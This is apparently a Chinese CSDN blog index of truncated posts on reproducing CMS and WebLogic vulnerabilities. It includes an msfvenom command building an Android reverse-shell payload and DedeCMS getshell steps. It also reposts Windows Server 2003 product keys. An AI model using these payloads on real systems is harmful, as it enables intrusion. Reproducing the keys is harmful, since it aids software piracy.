- 博客(23)
- 收藏
- 关注
原创 phpcms 2008安装以及漏洞
参考:https://stackoverflow.com/questions/12428755/1064-error-in-create-table-type-myisamhttps://www.cnblogs.com/kunspace/p/9760406.html先在ubuntu-18.04上安装了好几个版本都失败了,于是在windows上使用phpmystudy安装。修改Mysql配...
2018-11-29 17:35:29 1658
原创 sed和grep批量替换字符串
cqq@ubuntu:/var/www/phpcms2008_utf8_20081201$ grep "TYPE=MyISAM" -rl *announce/install/mysql.sqlask/install/mysql.sqlcomment/install/mysql.sqldigg/install/mysql.sqlerror_report/install/mysql.sql...
2018-11-29 16:42:28 1375 1
原创 DedeCMS_v5.7_友情链接CSRF+任意文件写入漏洞
参考:https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell略鸡肋,需要管理员点击。先在网站最下面点击“申请加入”,然后填入构造的网站链接:http://192.168.170.139:8888/dedecms_csrf.php然后该链接需要服务器后台可以访问的地址即...
2018-11-28 17:24:06 2775 1
转载 安装 Nessus 详细过程
https://blog.csdn.net/u012318074/article/details/72354387
2018-11-27 15:09:29 2548
原创 chrome打开pdf文件任意url跳转
下载:http://alidownload.xjpdf.com/xjpdf/software/pdfeditor.exe使用迅捷pdf编辑器:“打开网页链接”,插入链接。
2018-11-23 16:58:44 2913
原创 ubuntu安装发邮件
参考:https://www.centos.bz/2017/07/ubuntu-install-postfix-mail-server/安装:sudo apt-get install postfix -y安装之后在25端口监听。直接使用sendmail发送邮件。在垃圾邮箱中查看:...
2018-11-21 18:45:40 2452
原创 ubuntu 18.04上使用service_postgresql_start无法启动postgresql
参考:https://askubuntu.com/questions/883923/postgresql-service-vs-postgresql-service-under-lib-systemd-system使用sudo systemctl start postgresql即可。
2018-11-19 18:35:35 4358 2
原创 WebLogic远程代码执行漏洞(CVE-2018-2893)
在Windows上安装的时候需要cd到jdk的bin目录下,才能安装,否则提示错误:参考:https://www.oschina.net/question/2275765_220608安装完成。复现参考:https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2894https://xz.aliyun.com/t/...
2018-11-19 16:32:54 4185
原创 WebLogic反序列化漏洞(CVE-2017-3248)
参考:https://paper.seebug.org/333/环境安装反弹shell参考:https://w00troot.blogspot.com/2017/05/getting-reverse-shell-from-web-shell.htmlweblogic在服务器命令行安装步骤参考:https://blog.csdn.net/caiqiiqi/article/details/...
2018-11-19 14:10:31 7384
转载 Weblogic-unable to get file lock, will retry …问题解决
删除相应文件,找到weblogic进程sudo kill -9 <进程id>https://www.cnblogs.com/shawWey/p/7368070.html
2018-11-19 11:24:14 4754
原创 weblogic命令行安装
参考:https://www.linuxidc.com/Linux/2016-12/138044.htm➜ weblogic java -jar wls1036_generic.jarUnable to instantiate GUI, defaulting to console mode.Extracting 0%........................................
2018-11-19 10:14:44 2476
转载 ubuntu安装java7
https://www.cnblogs.com/a2211009/p/4265225.html直接下载jdk压缩包方式安装(这里只介绍jdk7的,jdk8 的原理完全一致) 分为下面5个步骤1.官网下载JDK2.解压缩,放到指定目录3.配置环境变量4.设置系统默认JDK5. 测试jdk1.官网下载JDK 地址: http://www.oracle.com/technetwor...
2018-11-19 10:00:25 1090
原创 msfvenom生成apk payload然后得到meterpreter shell
先生成一个payload,带上meterpreter监听的地址和端口:msfvenom -p android/meterpreter/reverse_tcp LHOST=&amp;amp;lt;your public IP&amp;amp;gt; LPORT=80 -o msf.apk由于大号端口在我的wifi环境下无法出去,所以这里我设置为80端口。然后安装这个apk到手机。然后在msf上:use exploit/...
2018-11-15 13:20:40 4449 1
转载 51 信用卡管家 Android 客户端内部数据库文件可被盗取
原文:真的安全吗之51信用卡管家Android客户端审计报告 1.讲这个漏洞先要介绍一下一个安卓系统特性:db-journal 文件是 sqlite 的一个临时的日志文件,主 要用于 sqlite 事务回滚机制,在事务开始时产生,在事务结束时删除;当程序发生崩溃或者系统断 电时该文件将留在磁盘上,以便下次程序运行时进行事务回滚,其内容与同名的.db 文件相同。在 android 系统中,.d...
2018-11-14 16:17:05 440
转载 POST上传文件
原文:https://blog.csdn.net/xiaojianpitt/article/details/6856536POST上传文件最早的HTTP POST是不支持文件上传的,给编程开发带来很多问题。但是在1995年,ietf出台了rfc1867,也就是《RFC 1867 -Form-based File Upload in HTML》,用以支持文件上传。所以Content-Type的类...
2018-11-13 10:13:03 6595
原创 DeDeCMS v5.7{SP1,SP2} 密码修改漏洞(附PoC)
原文:https://paper.seebug.org/507/由于admin无法前台登录,所以需要先拿到admin的前台权限。先拿到admin的前台权限1.注册0000001用户名的账号审核通过(或者设置为不需审核)2. 访问/member/index.php?uid=0000001。注意只有访问了/member/index.php?uid=0000001才会生成相应的所需的cook...
2018-11-12 18:21:23 11831
原创 dedecms V5.7 SP2 web后台getshell
https://www.freebuf.com/vuls/164035.htmldede/tpl.php任意文件写入漏洞。条件:已登录后台。首先访问/dede/tpl.php?action=upload获取token值访问/dede/tpl.php?filename=&amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;action=savetagf
2018-11-12 15:26:18 5216
转载 windows server 2003序列号
转载自:https://www.cnblogs.com/feng-/p/3327792.html以下序列号全部来源于网络整理windows2003 64位注册码Windows 2003 R2 64bit Enterprise VOL Edition 企业版MR78C-GF2CY-KC864-DTG74-VMT73VPT7T-77D38-KWVW2-2G34P-73GBQBVPPQ-C...
2018-11-12 09:46:14 30399 3
原创 云EC电商cms安装
下载http://www.yunec.cn/download/Yun_EC_1.2.2.zip安装启用apache的mod php:cat /etc/apache2/mods-available/php5.6.loadLoadModule php5_module /usr/lib/apache2/modules/libphp5.6.so根据readme.txt中的说明,在需要安装的c...
2018-11-09 18:13:56 995
原创 Weblogic 小于10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)
之前本来复现过一次的,结果后来数据丢了,只好再来一遍。没找到在linux下命令行安装的方法,于是直接在windows上安装算了。10.3.6.0下载:https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_dev.zip?AuthParam=1541742692_e16e12f2c0404fdf4d6ce52a57f...
2018-11-09 14:56:09 1700
原创 Mac切换docker镜像源
用docker拉镜像的时候,碰到一个问题ERROR: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)解决方案:修改~/.docker/daemon.jso...
2018-11-01 10:05:01 15784 3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人